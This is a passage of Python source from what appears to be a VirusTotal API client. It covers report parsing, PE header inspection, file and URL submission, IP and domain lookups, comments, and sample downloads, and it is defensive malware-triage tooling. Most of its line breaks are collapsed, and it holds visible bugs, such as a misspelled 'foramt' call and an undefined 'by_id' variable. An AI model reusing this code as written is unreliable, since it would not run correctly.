jdata['additional_info']['compressedview']['file_types'][file_types]) if jdata['additional_info']['compressedview'].get('tags'): print('\n[+] Tags:') for tag in jdata['additional_info']['compressedview']['tags']: print('\t', tag) compressedview_add_list = ( 'lowest_datetime', 'highest_datetime', 'num_children', 'type', 'uncompressed_size', 'vhash' ) self.simple_print(jdata['additional_info']['compressedview'], compressedview_add_list) if jdata['additional_info'].get('detailed_email_parents') and ((kwargs.get('detailed_email_parents') or 'detailed_email_parents' in args) or kwargs.get('verbose')): if kwargs.get('return_json') and (kwargs.get('original-email') or 'original-email' in args): return_json['detailed_email_parents'] = jdata['additional_info']['detailed_email_parents'] else: if not kwargs.get('return_json'): print('\nDetailed email parents:') for email in jdata['additional_info']['detailed_email_parents']: if kwargs.get('email_original'): kwargs['value'] = [email.get('message_id')] parsed = self.parse_email(**kwargs) if parsed: return_json.setdefault('emails', []) if kwargs.get('return_json'): return_json['emails'].append(parsed) else: email_list = ( 'subject', 'sender', 'receiver', 'message_id', ) for key in email_list: if email.get(key): self.print_key(key, indent='\n', separator='') print('\t', email[key]) if email.get('message'): print('\nMessage:') if email['message'] is not None: for line in email['message'].split(b'\n'): 
print(line.strip()) if jdata.get('total') and kwargs.get('verbose'): print('\n[+] Detections:\n\t{positives}/{total} Positives/Total\n'.format(positives=jdata['positives'], total=jdata['total'])) if jdata.get('scans') and kwargs.get('verbose'): plist = [[]] for x in sorted(jdata.get('scans')): if jdata['scans'][x].get('detected'): plist.append([x, 'True', jdata['scans'][x]['result'] if jdata['scans'][x]['result'] else ' -- ', jdata['scans'][x]['version'] if 'version' in jdata['scans'][x] and jdata['scans'][x]['version'] else ' -- ', jdata['scans'][x]['update'] if 'update' in jdata['scans'][x] and jdata['scans'][x]['update'] else ' -- ' ]) av_size, result_size, version = get_adequate_table_sizes(jdata['scans']) if version == 9: version_align = 'c' else: version_align = 'l' if plist != [[]]: pretty_print_special(plist, ['Vendor name', 'Detected', 'Result', 'Version', 'Last Update'], [av_size, 9, result_size, version, 12], ['r', 'c', 'l', version_align, 'c'], kwargs.get('email_template') ) del plist if jdata.get('permalink') and kwargs.get('verbose'): print('\nPermanent link : {permalink}\n'.format(permalink=jdata['permalink'])) """ else: kwargs.update({'url_report':False}) result = parse_report(jdata, **kwargs) if kwargs.get('return_json'): return return_json else: return result def rescan(self, *args, **kwargs): """ This API allows you to rescan files in VirusTotal's file store without having to resubmit them, thus saving bandwidth. """ if len(kwargs.get('value')) == 1: pass elif isinstance(kwargs.get('value'), six.string_types): kwargs['value'] = [kwargs.get('value')] elif len(kwargs.get('value')) > 1 and not isinstance(kwargs.get('value'), six.string_types): pass for hash_part in kwargs.get('value'): if os.path.exists(hash_part): hash_part = hashlib.md5(open(hash_part, 'rb').read()).hexdigest() url = self.base.format('files/{id}/analyse'.foramt(id = hash_part)) jdatas, response = get_response(url, method='post') if isinstance(jdatas, list) and not filter(None, jdatas): print('Nothing found') return if not isinstance(jdatas, list): jdatas = [jdatas] if kwargs.get('return_raw'): return jdatas for jdata in jdatas: if _check_error(jdata): continue else: if jdata["data"].get('id'): print('[+] Check rescan result with id in few minutes : \n\tID : {id}'.format(id=jdata["data"]['id'])) def fileInfo(self, *args, **kwargs): mem_perm = { "0x0": "-", "0x1": "s", "0x2": "x", "0x3": "sx", "0x4": "r", "0x5": "sr", "0x6": "rx", "0x8": "w", "0xa": "wx", "0xc": "rw", } if PEFILE: files = kwargs.get('value') for file in files: try: pe = pefile.PE(file) except pefile.PEFormatError: print('[-] Not PE file') return print("\nName: {0}".format(file.split(b"/")[-1])) print("\n[+] Hashes") print("MD5: {0}".format(pe.sections[0].get_hash_md5())) print("SHA1: {0}".format(pe.sections[0].get_hash_sha1())) print("SHA256: {0}".format(pe.sections[0].get_hash_sha256())) print("SHA512: {0}".format(pe.sections[0].get_hash_sha512())) try: print('ImpHash: {0}'.format(pe.get_imphash())) except Exception as e: pass print("\n[+] Protections:") plist = [[]] plist.append([ str(bool(pe.OPTIONAL_HEADER.DllCharacteristics & 0x0040)), str(bool(pe.OPTIONAL_HEADER.DllCharacteristics & 0x0100)), str(bool(pe.OPTIONAL_HEADER.DllCharacteristics & 0x0400)), str(bool(pe.OPTIONAL_HEADER.DllCharacteristics & 0x4000)), ]) pretty_print_special(plist, ['ASLR', 'DEP', "SEG", "CFG"], [5, 5, 5, 5], ['c', 'c', 'c', 'c'], True) del plist if pe.FILE_HEADER.TimeDateStamp: print("\n[+] Created") val = pe.FILE_HEADER.TimeDateStamp ts = '0x%-8X' % (val) 
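                # The PE compile timestamp is attacker-controlled metadata: packed or
                # trojanized samples often carry zeroed, pre-2000 or future dates,
                # which is why the plausibility check below flags such values as
                # [SUSPICIOUS].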
try: ts += ' [%s UTC]' % time.asctime(time.gmtime(val)) that_year = time.gmtime(val)[0] this_year = time.gmtime(time.time())[0] if that_year < 2000 or that_year > this_year: ts += " [SUSPICIOUS]" except Exception as e: ts += ' [SUSPICIOUS]' if ts: print('\t{}'.format(ts)) if pe.sections: print("\n[+] Sections") plist = [[]] for section in pe.sections: if hex(section.Characteristics)[:3] in mem_perm: perm = str(mem_perm[hex(section.Characteristics)[:3]]) else: perm = hex(section.Characteristics)[:3] plist.append([section.Name.decode("utf-8").rstrip("\0"), section.SizeOfRawData, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.Characteristics), perm]) pretty_print_special(plist, ['Name', 'SizeOfRawData', "VA", "Virtual Size", "Characteristics", "R|W|X"], [10, 15, 10, 10, 15, 5], ['c', 'c', 'c', 'c', 'c', 'c'], True) del plist if hasattr(pe, "DIRECTORY_ENTRY_IMPORT") and pe.DIRECTORY_ENTRY_IMPORT: print("\n[+] Imports") for entry in pe.DIRECTORY_ENTRY_IMPORT: print(' {}'.format(entry.dll.decode())) for imp in entry.imports: print('\t{} {}'.format(hex(imp.address), imp.name.decode() if imp.name is not None else "")) try: if pe.IMAGE_DIRECTORY_ENTRY_EXPORT.symbols: print("\n[+] Exports") for exp in pe.IMAGE_DIRECTORY_ENTRY_EXPORT.symbols: print(hex(pe.OPTIONAL_HEADER.ImageBase + exp.address), exp.name, exp.ordinal) except Exception as e: pass if MAGIC and pe: try: ms = magic.from_file(file) if ms: print("\n[+] File type") ms = magic.from_file(file) print('\t{}'.format(ms)) except Exception as e: print(e) if kwargs.get('userdb') and os.path.exists(kwargs.get('userdb')): signatures = peutils.SignatureDatabase(kwargs.get('userdb')) if signatures.match(pe, ep_only = True) != None: print("\n[+] Packer") print('\t{}'.format(signatures.match(pe, ep_only = True)[0])) else: pack = peutils.is_probably_packed(pe) if pack == 1: print("\n[+] Packer") print("\t[+] Based on the sections entropy check! file is possibly packed") # ToDo verify if works def fileScan(self, *args, **kwargs): """ Allows to send a file to be analysed by VirusTotal. Before performing your submissions we encourage you to retrieve the latest report on the files, if it is recent enough you might want to save time and bandwidth by making use of it. File size limit is 32MB, in order to submmit files up to 200MB you must request an special upload URL. Before send to scan, file will be checked if not scanned before, for save bandwich and VT resources :) """ result = False if len(kwargs.get('value')) == 1 and isinstance(kwargs.get('value'), list): if os.path.isdir(kwargs.get('value')[0]): # ToDo os.walk for Marc kwargs['value'] = glob(os.path.join(kwargs.get('value')[0], '*')) if kwargs.get('file_scan_recursive'): all_files = list() for path, dirs, files in os.walk(kwargs['value']): for file in files: all_files.append(os.path.join(path, file)) kwargs['value'] = all_files url = self.base.format('files') if not kwargs.get('scan'): for index, c_file in enumerate(kwargs.get('value')): if os.path.isfile(c_file): if (os.path.getsize(c_file) / 1048576) <= 128: kwargs.get('value')[index] = hashlib.md5(open(c_file, 'rb').read()).hexdigest() else: print('[!] 
Ignored file: {file}, size is to big, permitted size is 128Mb'.format(file=c_file)) kwargs['not_exit'] = True hash_list = kwargs.get('value') for submit_file in hash_list: kwargs.update({'value':submit_file}) # Check all list of files, not only one result = self.getReport(**kwargs) if not result and kwargs.get('scan') is True: if os.path.isfile(submit_file): file_name = os.path.split(submit_file)[-1] files = {"file": (file_name, open(submit_file, 'rb'))} try: jdata, response = get_response( url, files=files, #params=self.params, method="post" ) if kwargs.get('return_raw'): return jdata print("[+] Scan ID: {}".format(jdata["data"]["id"])) except UnicodeDecodeError: print('\n[!] Sorry filaname is not utf-8 format, other format not suported at the moment') print('[!] Ignored file: {file}\n'.format(file=submit_file)) elif not result and kwargs.get('scan') == False: print('\nReport for file/hash : {0} not found'.format(submit_file)) # ToDo finish def url_scan_and_report(self, *args, **kwargs): """ Url scan: URLs can also be submitted for scanning. Once again, before performing your submission we encourage you to retrieve the latest report on the URL, if it is recent enough you might want to save time and bandwidth by making use of it. Url report: A URL will retrieve the most recent report on the given URL. You may also specify a scan_id (sha256-timestamp as returned by the URL submission API) to access a specific report. At the same time, you can specify a space separated list made up of a combination of hashes and scan_ids so as to perform a batch request with one single call (up to 4 resources or 25 if you have private api, per call with the standard request rate). """ url_uploads = list() result = False md5_hash = '' if kwargs.get('value')[0].endswith('.json'): result, name = is_file(kwargs.get('value')) if result: jdata = load_file(name) kwargs['dump'] = False else: if isinstance(kwargs.get('value'), list) and len(kwargs.get('value')) == 1: if os.path.isfile(kwargs.get('value')[0]): url_uploads = open(kwargs.get('value')[0], 'rb').readlines() else: url_uploads = kwargs.get('value') elif isinstance(kwargs.get('value'), six.string_types): url_uploads = [kwargs.get('value')] elif len(kwargs.get('value')) > 1 and not isinstance(kwargs.get('value'), six.string_types): pass cont = 0 for url_upload in url_uploads: cont += 1 to_show = url_upload if isinstance(url_upload, list): if "\n" in url_upload[0]: to_show = "\n\t".join(url_upload[0].split(b"\n")) else: to_show = "\n\t".join(url_upload) url = self.base.format('urls') if kwargs.get('key') == 'scan': print('Submitting url(s) for analysis: \n\t{url}'.format(url=to_show)) self.params['url'] = url_upload elif kwargs.get('key') == 'report': print('\nSearching for url(s) report: \n\t{url}'.format(url=to_show)) self.params['resource'] = base64.urlsafe_b64encode(url_upload.encode("utf-8")).strip(b"=") self.params['scan'] = kwargs.get('action') url = self.base.format('urls/report') jdata, response = get_response(url, params=self.params, method="post") if kwargs.get('return_raw'): return jdata if isinstance(jdata, list): for jdata_part in jdata: if jdata_part is None: print('[-] Nothing found') else: if kwargs.get('dump'): md5_hash = hashlib.md5(jdata_part['url']).hexdigest() if kwargs.get('key') == 'report': kwargs.update({'url_report':True}) parse_report(jdata_part, **kwargs) elif kwargs.get('key') == 'scan': if jdata_part["data"].get('id'): print('\n\ID : {id}\t{url}'.format(id=jdata_part['data']['id'], url=jdata_part['url'])) else: #print(jdata) if 
jdata is None: print('[-] Nothing found') elif _check_error(jdata): pass # ToDo rid of this else: if kwargs.get('dump'): md5_hash = hashlib.md5(jdata['data']['id'].encode("utf-8")).hexdigest() jsondump(json, md5_hash) if kwargs.get('key') == 'report': kwargs.update({'url_report': True}) parse_report(jdata, **kwargs) elif kwargs.get('key') == 'scan': _check_error(jdata) if cont % 4 == 0: print('[+] Sleep 60 seconds between the requests') time.sleep(60) def __parse_relationships(self, jdata, value): keys = ('communicating_files', 'downloaded_files', 'graphs', 'referrer_files', 'resolutions', 'siblings', 'subdomains', 'urls') for key in keys: if key in jdata and jdata[key].get("data", []): self.print_key(key, indent='\n', separator='[+]') for block in jdata[key].get("data", []): if key == "resolutions": print('\t', block['id'].replace(value, '')) else: print('\t', block['id']) def getIP(self, *args, **kwargs): """ A valid IPv4 address in dotted quad notation, for the time being only IPv4 addresses are supported. """ jdatas = list() return_json = dict() try: result, name = is_file(kwargs.get('value')[0]) if result: jdatas = [load_file(name)] kwargs['dump'] = False md5_hash = '' except IndexError: print('Something going wrong') return if not jdatas: if isinstance(kwargs.get('value'), list) and len(kwargs.get('value')) == 1: pass elif isinstance(kwargs.get('value'), six.string_types): kwargs['value'] = [kwargs.get('value')] kwargs['value'] = [urlparse(ip).netloc if ip.startswith(('http://', 'https://')) else ip for ip in kwargs.get('value')] url = self.base.format('ip_addresses/') for ip in kwargs.get('value'): url += ip if kwargs.get('ip_post_comments'): url += '/comments' method = 'post' elif kwargs.get('ip_get_comments'): url += '/comments' method = 'get' else: #url += '/' + kwargs['ip_get_relationships'] self.params["relationships"] = 'communicating_files,downloaded_files,graphs,referrer_files,urls' method = "get" jdata, response = get_response(url, method=method, params=self.params) #print(jdata) jdatas.append((ip, jdata)) if kwargs.get('return_raw'): return jdatas for ip, jdata in jdatas: if jdata.get('data', False) is not False: if not (kwargs.get('return_json') or kwargs.get('return_raw')) and kwargs.get('verbose'): print('\n[+] IP:', ip) if kwargs.get("ip", False) is True: simple_list = ( 'asn', 'as_owner', 'country', 'continent', 'network', 'regional_internet_registry', 'reputation', 'total_votes', #: {'harmless': 3, 'malicious': 0}}, ) for key in simple_list: if jdata['data']['attributes'].get(key, "") and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key:jdata['data']['attributes'][key]}) else: self.print_key(key, indent='\n', separator='[+]') print('\t', jdata['data']['attributes'].get(key)) self.__parse_relationships(jdata['data']['relationships'], ip) elif kwargs.get("ip_get_comments", False) is True: simple_list = ( "date", "tags", "text", "votes", "links" ) for block in jdata['data']: print("[+] Comment ID: {}".format(block["id"])) for key in simple_list: if block["attributes"].get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key:block["attributes"][key]}) else: self.print_key(key, indent='', separator='\t[+]') if key == "date": print('\t', datetime.fromtimestamp(block["attributes"].get(key)).strftime('%Y-%m-%d %H:%M:%S')) else: print('\t', block["attributes"].get(key)) #elif kwargs.get("ip_post_comments", False) is True: else: 
#self._print_complex_dict(jdata['data'], 'categories') self.__parse_relationships(jdata['data']['relationships'], ip) simple_list = ( "url", "last_final_url", "tags", "total_votes", "last_analysis_date", "last_analysis_stats", ) """ for block in jdata['data']['attributes']: print(block) for key in simple_list: if block["attributes"].get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key:block["attributes"][key]}) else: self.print_key(key, indent='', separator='\t[+]') if key == "last_analysis_date": print('\t', datetime.fromtimestamp(block["attributes"].get(key)).strftime('%Y-%m-%d %H:%M:%S')) else: print('\t', block["attributes"].get(key)) #[{u'attributes': {u'total_votes': {u'harmless': 0, u'malicious': 0}, u'last_final_url': u'https://msg3.club/', u'tags': [], u'url': u'https://msg3.club/', u'last_analysis_date': 1551639858, u'last_analysis_stats': {u'harmless': 57, u'malicious': 1, u'suspicious': 0, u'undetected': 8, u'timeout': 0}, u'first_submission_date': 1551639858, self.last_analysis_results(block['attributes'], args, kwargs) """ if kwargs.get('return_json'): return_json.update(self.__detected_samples(jdata, *args, **kwargs)) else: return_json = self.__detected_samples(jdata, *args, **kwargs) if jdata.get('resolutions') and ((kwargs.get('resolutions') or 'resolutions' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({'resolutions':jdata['resolutions']}) else: print('\n[+] Lastest domain resolved\n') pretty_print(sorted(jdata['resolutions'], key=methodcaller( 'get', 'last_resolved'), reverse=True), ['last_resolved', 'hostname'], False, False, kwargs.get('email_template') ) if kwargs.get('dump') is True: md5_hash = hashlib.md5(name).hexdigest() jsondump(jdata, md5_hash) if kwargs.get('return_json'): return return_json def getDomain(self, *args, **kwargs): """ Get domain last scan, detected urls and resolved IPs """ return_json = dict() jdatas = list() try: result, name = is_file(kwargs.get('value')[0]) if result: jdatas = [load_file(name)] kwargs['dump'] = False md5_hash = '' except IndexError: print('[-] Something going wrong') return if not jdatas: if isinstance(kwargs.get('value'), list) and len(kwargs.get('value')) == 1 and \ os.path.exists(kwargs.get("value")[0]) and kwargs.get("value")[0].endswith(".txt"): kwargs["value"] = [domain.strip() for domain in open(kwargs.get("value")[0], "rb").readlines()] elif isinstance(kwargs.get('value'), six.string_types): kwargs['value'] = [kwargs.get('value')] kwargs['value'] = [urlparse(domain).netloc.lower() if domain.startswith(('http://', 'https://')) else domain for domain in kwargs.get('value')] url = self.base.format('domains/') for domain in kwargs.get('value'): url = self.base.format('domains/{}'.format(domain)) if kwargs.get('domain_post_comments'): url += '/comments' method = 'post' data = '{"data": {"type": "comment", "attributes": {"text": "Lorem ipsum dolor sit ..."}}}' elif kwargs.get('domain_get_comments'): url += '/comments' method = 'get' else: #url += '/' + kwargs['domain_get_relationships'] self.params["relationships"] = 'communicating_files,downloaded_files,graphs,referrer_files,resolutions,siblings,subdomains,urls' method = "get" jdata, response = get_response(url, method=method, params=self.params) jdatas.append((domain, jdata)) if kwargs.get('return_raw'): return jdatas for domain, jdata in jdatas: if jdata.get('data'): jdata = jdata['data'] if not (kwargs.get('return_json') or kwargs.get('return_raw')) and 
kwargs.get('verbose'): print('\n[+] Domain:', domain) single_dict = ( 'TrendMicro category', 'Dr.Web category', 'BitDefender category', 'Websense ThreatSeeker category', 'Alexa category', 'Alexa domain info', 'Alexa rank', 'Opera domain info', 'subdomains', 'siblings', ) complicated_dict = ( 'WOT domain info', 'Webutation domain info', ) for key in single_dict: if jdata.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key: jdata[key]}) else: self.print_key(key) if isinstance(jdata[key], list): print('\t', '\n\t'.join(jdata[key])) else: print('\t{0}'.format(jdata[key])) for key in complicated_dict: if jdata.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key: jdata[key]}) else: self.__print_complex_dict(jdata, key, kwargs) if jdata['attributes'].get('whois') and ((kwargs.get('whois') or 'whois' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({'whois': jdata['attributes']['whois']}) else: print('\n[+] Whois data:\n') try: print('\t', jdata['attributes']['whois'].replace('\n', '\n\t')) except: try: print('\t', jdata['attributes']['whois'].encode('utf-8', 'replace').replace('\n', '\n\t')) except: print('Old version of python has some problems with converting chars to ansii') self._print_complex_dict(jdata['attributes'], 'categories') self.__parse_relationships(jdata['relationships'], domain) if kwargs.get("domain_get_comments", False) is True: simple_list = ( "date", "tags", "text", "votes", "links" ) for block in jdata: print("[+] Comment ID: {}".format(block["id"])) for key in simple_list: if block.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key: block["attributes"][key]}) else: self.print_key(key, indent='', separator='\t[+]') if key == "date": print('\t', datetime.fromtimestamp(block.get(key)).strftime('%Y-%m-%d %H:%M:%S')) else: print('\t', block.get(key)) # ToDo #elif kwargs.get("post_post_comments", False) is True: elif kwargs.get('domain_get_relationships', False): self._print_complex_dict(jdata['attributes'], 'categories') self.__parse_relationships(jdata['relationships'], domain) """ simple_list = ( "url", "last_final_url", "tags", "total_votes", "last_analysis_date", "last_analysis_stats", ) for block in jdata['attributes']: print(block) for key in simple_list: if block.get(key, "") and ((kwargs.get(key) or key in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({key:block[key]}) else: self.print_key(key, indent='', separator='\t[+]') if key == "last_analysis_date": print('\t', datetime.fromtimestamp(block.get(key)).strftime('%Y-%m-%d %H:%M:%S')) else: print('\t', block.get(key)) #[{u'attributes': {u'total_votes': {u'harmless': 0, u'malicious': 0}, u'last_final_url': u'https://msg3.club/', u'tags': [], u'url': u'https://msg3.club/', u'last_analysis_date': 1551639858, u'last_analysis_stats': {u'harmless': 57, u'malicious': 1, u'suspicious': 0, u'undetected': 8, u'timeout': 0}, u'first_submission_date': 1551639858, self.last_analysis_results(block, args, kwargs) """ if kwargs.get('return_json'): return_json.update(self.__detected_samples(jdata, *args, **kwargs)) else: return_json = self.__detected_samples(jdata, *args, **kwargs) if jdata.get('pcaps') and ((kwargs.get('pcaps') or 'pcaps' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({'pcaps': 
jdata['pcaps']}) else: print('\n') pretty_print(jdata['pcaps'], ['pcaps'], [70], ['c'], kwargs.get('email_template')) if jdata.get('resolutions') and ((kwargs.get('resolutions') or 'resolutions' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json.update({'passive_dns': jdata['resolutions']['data']}) else: print('\n[+] Passive DNS replication\n') pretty_print(jdata['resolutions']['data'], ['ip_address', 'type'], [25, 20], ['c', 'c'], kwargs.get('email_template') ) if kwargs.get('walk') and jdata.get('resolutions', {}).get("data", []): filter_ip = list() for ip in jdata['resolutions']['data']: ip = ip['id'].replace(domain, '') if ip not in filter_ip: print('\n\n[+] Checking data for ip: {0}'.format(ip)) kwargs['value'] = ip self.getIP(**kwargs) if kwargs.get('dump') is True: md5_hash = hashlib.md5(name.encode("utf-8")).hexdigest() jsondump(jdata, md5_hash) if kwargs.get('return_json'): return return_json # ToDo remove? def clusters(self, *args, **kwargs): """ VirusTotal has built its own in-house file similarity clustering functionality. At present, this clustering works only on PE files and is based on a very basic PE feature hash, which can be very often confused by certain compression and packing strategies. In other words, this clustering logic is no holly grail. This API offers a programmatic access to the clustering section of VirusTotal Intelligence: https://www.virustotal.com/intelligence/clustering/ Please note that you must be logged in with a valid VirusTotal Community user with access to VirusTotal Intelligence in order to be able to view the clustering listing. All of the API responses are JSON objects, if no clusters were identified for the given time frame, this JSON will have a response_code property equal to 0, if there was some sort of error with your query this code will be set to -1, if your query succeded and file similarity clusters were found it will have a value of 1 and the rest of the JSON properties will contain the clustering information. """ result, name = is_file(kwargs.get('value')[0]) if result: jdata = load_file(name) dump = False else: url = self.base.format('file/clusters') if by_id: self.params['query'] = 'cluster:{0}'.format(kwargs.get('value')[0]) else: self.params['date'] = name jdata, response = get_response(url, params=self.params) if kwargs.get('return_raw'): return jdata if _check_error(jdata): return simple_list = ( 'size_top200', 'num_clusters', ) self.simple_print(jdata, simple_list, indent='\n\t') for key in simple_list: if jdata.get(key): self.print_key(key, indent='\n\t') print('\n\t', jdata.get(key)) if jdata.get('clusters'): plist = [[]] for line in jdata['clusters']: plist.append( [line['label'], line['avg_positives'], line['id'], line['size']]) pretty_print_special( plist, ['Label', 'AV Detections', 'Id', 'Size'], [40, 15, 80, 8], ['l', 'c', 'l', 'c'], kwargs.get('email_template') ) if dump: jsondump(jdata, 'clusters_{0}'.format(name)) # ToDo verify add comment def comment(self, *args, **kwargs): """ Add comment: The actual review, you can tag it using the "#" twitter-like syntax (e.g. #disinfection #zbot) and reference users using the "@" syntax (e.g. @VirusTotalTeam). Get comments: The application answers with the comments sorted in descending order according to their date. Please note that, for timeout reasons, the application will only answer back with at most 25 comments. If the answer contains less than 25 comments it means that there are no more comments for that item. 
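
        A minimal usage sketch (illustrative only; the hash and the comment text are
        placeholders, not values from the original project):

            vt = vtAPI()
            vt.comment(value=['<sha256 hash>', 'possible #zbot dropper'], action='add')
            vt.comment(value=['<sha256 hash>'], action='get')
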
On the other hand, if 25 comments were returned you should keep issuing further calls making use of the optional before parameter, this parameter should be fixed to the oldest (last in the list) comment's date token, exactly in the same way as returned by your previous API call (e.g. 20120404132340). """ result, name = is_file(kwargs.get('value')) if result: jdata = load_file(name) else: value = kwargs.get('value') if value[0].startswith('http'): result_hash = re.findall('[\w\d]{64}', value[0], re.I) if result_hash: value = result_hash[0] else: print('[-] Hash not found in url') return url = self.base.format('files/{id}/comments'.format(id = value[0])) if kwargs.get('action') == 'add': self.params['comment'] = value[1] jdata, response = get_response(url, params=self.params, method="post") elif kwargs.get('action') == 'get': #if value[0]: # self.params['before'] = kwargs.get('date') jdata, response = get_response(url) #params=self.params else: print('\n[!] Support only get/add comments action \n') return #import code #code.interact(local=dict(globals(), **locals())) if kwargs.get('return_raw'): return jdata if kwargs.get('action') == 'add': _check_error(jdata) else: if "data" not in jdata: print('\n[!] This analysis doen\'t have any comment\n') return else: if jdata.get('data'): for comment in jdata['data']: date_formated = datetime.fromtimestamp(comment["attributes"]['date']).strftime('%Y-%m-%d %H:%M:%S') if comment['attributes'].get('date'): print('Date : {0}'.format(date_formated)) if comment['attributes'].get('tags'): print('Tags : {0}'.format(", ".join(comment['attributes']['tags']))) if comment['attributes'].get('text'): print('Comment : {0}\n'.format(comment['attributes']['text'])) if comment.get('id'): print('Comment ID : {0}\n'.format(comment['id'])) def download(self, *args, **kwargs): """ Files that are successfully executed may communicate with certain network resources, all this communication is recorded in a network traffic dump (pcap file). This API allows you to retrieve the network traffic dump generated during the file's execution. The md5/sha1/sha256 hash of the file whose network traffic dump you want to retrieve. 
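
        A minimal usage sketch (illustrative only; the hash is a placeholder and an
        API key with download privileges is assumed):

            vt = vtAPI()
            vt.download(value=['<sha256 hash>'], download='file')

        The same method also handles the .pcap naming when download='pcap' is
        requested.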
""" if isinstance(kwargs.get("value"), list) and len(kwargs.get("value")) == 1: if os.path.exists(kwargs.get("value")[0]) and kwargs.get("value")[0].endswith(".txt"): kwargs["value"] = [dl_hash.strip() for dl_hash in open(kwargs.get("value")[0], "rb").readlines()] elif isinstance(kwargs.get("value"), six.string_types): kwargs["value"] = [kwargs.get("value")] kwargs["value"] = deque(kwargs["value"]) threads = kwargs.get("download_threads", 5) if len(kwargs["value"]) < threads: threads = len(kwargs["value"]) threads_list = list() self.downloaded_to_return = dict() self._stop = threading.Event() self._stop.set() for worked in range(threads): thread = threading.Thread(target=self.__downloader, args=args, kwargs=kwargs) thread.daemon = True thread.start() threads_list.append(thread) while kwargs["value"]: time.sleep(1) self._stop.clear() for thread in threads_list: thread.join() if kwargs.get("return_raw", False): return self.downloaded_to_return def __name_auxiliar(self, *args, **kwargs): name = kwargs.get('name') if os.path.exists(name): i = 0 while True: if not os.path.exists('{}_{}'.format(name, i)): name = '{}_{}'.format(name, i) break i += 1 return name def __downloader(self, *args, **kwargs): """ Auxiliar threaded downloader """ super_file_type = kwargs.get('download') while kwargs['value'] and self._stop.is_set(): try: f_hash = kwargs['value'].pop() f_hash = f_hash.strip() if isinstance(f_hash, bytes): f_hash = f_hash.decode("utf-8") if f_hash != '': if f_hash.find(',') != -1: file_type = f_hash.split(',')[-1] f_hash = f_hash.split(',')[0] else: file_type = super_file_type file_type = kwargs.get('download') if f_hash.startswith('http'): result_hash = re.findall('[\w\d]{64}', f_hash, re.I) if result_hash: f_hash = result_hash[0] else: print('[-] Hash not found in url') url = "https://www.virustotal.com/api/v3/files/{id}/download".format(id = f_hash) jdata, response = get_response(url) if response: if response.status_code == 404: print('\n[!] 
File not found - {0}\n'.format(f_hash)) if response.status_code == 200: if kwargs.get('name', ""): name = self.__name_auxiliar(*args, **kwargs) else: name = '{hash}'.format(hash=f_hash) if file_type == "pcap": name += ".pcap" #Sanity checks downloaded_hash = '' if len(f_hash) == 32: downloaded_hash = hashlib.md5(response.content).hexdigest() elif len(f_hash) == 40: downloaded_hash = hashlib.sha1(response.content).hexdigest() elif len(f_hash) == 64: downloaded_hash = hashlib.sha256(response.content).hexdigest() if f_hash != downloaded_hash: print('[-] Downloaded content has not the same hash as requested') if kwargs.get('return_raw'): self.downloaded_to_return.setdefault(f_hash, response.content) else: dumped = open(name, 'wb') dumped.write(response.content) dumped.close() print('\tDownloaded to File -- {name}'.format(name=name)) else: self.downloaded_to_return.setdefault(f_hash, 'failed') except Exception as e: print(e) self._stop.set() # normal email attachment extractor def __email_parse_attachment(self, message_part): attachment = '' filename = '' size = '' content_type = '' sha256_hash = '' sha1_hash = '' md5_hash = '' if message_part.get_filename(): filename = message_part.get_filename() content_type = message_part.get_content_type() attachment = message_part.get_payload(decode=True) if attachment: size = len(attachment) sha256_hash = hashlib.sha256(attachment).hexdigest() sha1_hash = hashlib.sha1(attachment).hexdigest() md5_hash = hashlib.md5(attachment).hexdigest() return attachment, filename, size, content_type, sha256_hash, sha1_hash, md5_hash def __email_print(self, email_dict, email_id, *args, **kwargs): if len(email_id) >=64: # in case if you pass full email instead of hash email_id = hashlib.sha256(email_id.encode("utf-8")).hexdigest() print('\n[+] Details of email: {0}'.format(email_id)) plist = [[]] if 'Attachments' in email_dict: for i, part in enumerate(email_dict['Attachments']): path_where_save = kwargs.get('save_attachment') if path_where_save: if not os.path.exists(path_where_save): os.makedirs(path_where_save) print('[+] Saving attachment with hash: {0}'.format(email_dict['Attachments'][i]['sha256'])) dump_file = open(os.path.join(path_where_save, email_dict['Attachments'][i]['sha256']), 'wb') # ToDo improve this """ if email_dict['Attachments'][i]['attachment'].startswith("filename="): attach_parts = email_dict['Attachments'][i]['attachment'].split(b"\r\n\r\n") if len(attach_parts) >= 2: email_dict['Attachments'][i]['attachment'] = base64.b64decode(attach_parts[1]) """ dump_file.write(email_dict['Attachments'][i]['attachment']) dump_file.close() del email_dict['Attachments'][i]['attachment'] key_s, value_s = get_sizes(email_dict) for k,v in sorted(email_dict.items()): if k == 'Attachments': line = '' for part in email_dict['Attachments']: #to have order for value in ('md5', 'sha1', 'sha256', 'name', 'size', 'content_type'): if value == "name": try: line += '{0} : {1}\n'.format(value, part.get(value, "").encode("utf-8", "replace")) except Exception as e: print(value, e) else: line += '{0} : {1}\n'.format(value, part.get(value, "")) plist.append([k,line]) else: plist.append([k,v]) if plist != [[]]: pretty_print_special( plist, ['Key', 'Value'], [key_s, value_s], ['r', 'l'], kwargs.get('email_template') ) def __download_email(self, email_id, *args, **kwargs): original_email = '' original_email = self.download(**{ 'value': [email_id], 'api_type': kwargs.get('api_type'), 'download': 'file', 'intelligence': kwargs.get('intelligence'), 'return_raw': True, }) return 
